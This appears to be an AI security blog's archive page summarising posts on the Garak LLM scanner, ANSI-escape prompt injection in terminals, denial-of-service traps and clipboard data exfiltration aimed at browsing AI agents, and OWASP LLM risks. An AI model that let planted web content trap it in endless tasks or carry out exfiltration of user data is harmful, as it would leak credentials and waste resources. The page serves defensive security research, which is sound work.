Author name: Martin

Uncategorized

Quick overview of Garak – a free LLM vulnerability scanner

The Garak LLM vulnerability scanner is an open-source tool developed by NVIDIA to assess security risks in large language models (LLMs). It automates probing for vulnerabilities such as prompt injection, data leakage, jailbreaking, and other adversarial exploits by running targeted tests against AI models. Garak supports multiple model types, including local and cloud-based LLMs, and generates structured reports highlighting security weaknesses. By leveraging predefined and customizable probes, security researchers and AI developers can use Garak to systematically evaluate model robustness, mitigate risks, and improve AI system resilience against exploitation.

Uncategorized

Prompt Injection into terminals / IDEs via ANSI escape code characters

Prompt injection threats in terminals and IDEs via ANSI escape characters exploit the ability of these sequences to manipulate text display, execute hidden commands, or deceive users. Attackers can craft malicious ANSI sequences embedded in logs, error messages, or even code comments that, when viewed in a vulnerable terminal or IDE, execute unintended commands, alter text, or phish credentials by tricking users into copying and pasting manipulated input. This risk is especially critical in developer environments where logs, shell outputs, or debugging sessions may contain untrusted input, potentially leading to privilege escalation, data leakage, or unauthorized command execution if proper sanitization and filtering are not enforced.

Uncategorized

AI Agent Denial of Service (DoS), Rabbit R1, AI Security Expert

When AI agents autonomously browse websites and encounter tasks that are intentionally unsolvable or computationally intensive, they become susceptible to Denial-of-Service (DoS) attacks, leading to resource exhaustion or system paralysis. Malicious actors can craft web pages embedding endless loops, impossible CAPTCHA challenges, or resource-draining scripts specifically designed to trap these automated agents in perpetual execution. As the AI agent persistently attempts to resolve the unsolvable task, it inadvertently consumes significant computational resources, bandwidth, and memory, effectively causing service degradation or downtime. Preventing such attacks necessitates robust timeouts, task-complexity assessments, intelligent anomaly detection, and implementing restrictions on computational resources allocated to AI-driven browsing activities.

Uncategorized

AI Agent Data Exfiltration, Rabbit R1, AI Security Expert

AI agents that autonomously browse the web introduce significant security risks, particularly related to data exfiltration through covert copy-and-paste operations to attacker-controlled servers. Such agents, when compromised or inadequately secured, can inadvertently or maliciously transfer sensitive information obtained during browsing activities—including user credentials, proprietary business data, or confidential communications—directly into adversarial hands. Attackers exploit the autonomous nature of these AI agents, inserting scripts or leveraging deceptive interfaces to manipulate clipboard operations, thereby exfiltrating valuable data silently and efficiently. Mitigating this risk requires stringent security controls, such as sandboxed environments, strict access management, continuous monitoring of AI activities, and robust detection mechanisms that identify abnormal behaviors indicative of potential data theft.

Uncategorized

OWASP Top 10 LLM07:2025 System Prompt Leakage

System Prompt Leakage refers to the risk that system prompts—internal instructions guiding the behavior of Large Language Models (LLMs)—may inadvertently contain sensitive information, such as credentials or internal rules, which, if exposed, can be exploited by attackers to compromise the system’s security. ​

Uncategorized

OWASP Top 10 LLM06:2025 Excessive Agency

Excessive Agency refers to the vulnerability arising when Large Language Models (LLMs) are granted more functionality, permissions, or autonomy than necessary, enabling them to perform unintended or harmful actions due to unexpected, ambiguous, or manipulated outputs. ​

Uncategorized

OWASP Top 10 LLM05:2025 Improper Output Handling

Improper Output Handling refers to the inadequate validation and sanitization of outputs generated by Large Language Models (LLMs) before they are processed by other systems, potentially leading to security vulnerabilities such as remote code execution, cross-site scripting (XSS), or SQL injection.

Scroll to Top